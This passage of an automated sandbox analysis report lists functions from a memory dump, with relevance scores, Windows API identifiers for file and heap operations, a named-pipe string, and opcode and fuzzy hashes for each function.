                                                                                                                                                                                                      • String ID: \\.\pipe\
                                                                                                                                                                                                      • API String ID: 3081899298-91387939
                                                                                                                                                                                                      • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                                                                                                                                                      • Instruction ID: 2045c51461cb6e3c4e330e0400f06f28497d849f0a3ece22e2d95f09a3f1f34d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2E71B63A2027C186E7A49E2798C93A96794F38DF84F54C015FD2E5BB8BDE35C649C700
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0000028092382330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000083.00000002.2489519243.0000028092380000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000028092380000, based on PE: true
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FileType
                                                                                                                                                                                                      • String ID: \\.\pipe\
                                                                                                                                                                                                      • API String ID: 3081899298-91387939
                                                                                                                                                                                                      • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                                                                                                                                                      • Instruction ID: 114f22edd4db67974f88229144f196d39074de81b4497283f5c74c689a9761f4
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                                                                                                                                                      • Instruction Fuzzy Hash: B651C73A2067C181F7A4DA2AA4ED36AA791F38DF40F44C115EE6E07B5BDE39C50C8750
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 00000280923926F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000083.00000002.2489519243.0000028092380000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000028092380000, based on PE: true
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ErrorFileLastWrite
                                                                                                                                                                                                      • String ID: U
                                                                                                                                                                                                      • API String ID: 442123175-4171548499
                                                                                                                                                                                                      • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                                                                                                                                                      • Instruction ID: 0e61806694ce1a69e6e7b965a6c91b5facd84c07cbea90de033002916ccf1ea9
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: DA41A23A216A80C6DBA0DF26E4893AA77A0F79DB94F40C021EE5D87795EF7CC449C740
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 00000280923894A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000083.00000002.2489519243.0000028092380000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000028092380000, based on PE: true
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                      • String ID: csm
                                                                                                                                                                                                      • API String ID: 2573137834-1018135373
                                                                                                                                                                                                      • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                                                                                                                                                      • Instruction ID: d2d45102f6022ad079f417c59ce483d6dfe33ceadc998bce2d81460228beb5a2
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: AE112B3A216B8082EBA18B15E48435977E5F788F94F59C220EF9C0B769DF3CC555CB00
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0000028092381BF4 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000083.00000002.2489519243.0000028092380000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000028092380000, based on PE: true
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Heap$Process$AllocFree
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 756756679-0
                                                                                                                                                                                                      • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                                                                                                                                                      • Instruction ID: 586a83de353d49db31800be4fb894c08c871f1434d6ff2b5443c07a6e9e5de38
                                                                                                                                                                                                      • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 80114F29A03B4481EB94DB66A88A22977A1FB8DFC0F18C025DE9D57766DE78C446D700
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 0000028092381268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000083.00000002.2489519243.0000028092380000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000028092380000, based on PE: true
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Heap$AllocProcess
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1617791916-0
                                                                                                                                                                                                      • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                                                                                                                                                      • Instruction ID: a77cece094574aa69811fd8dadb047c79e938b3ddca75d249d5009af6d125fe3
                                                                                                                                                                                                      • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 55E03939A03604C6EB44AB62D84934A36E1EB8EF86F04C024C91907362DFBD84DACF50
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%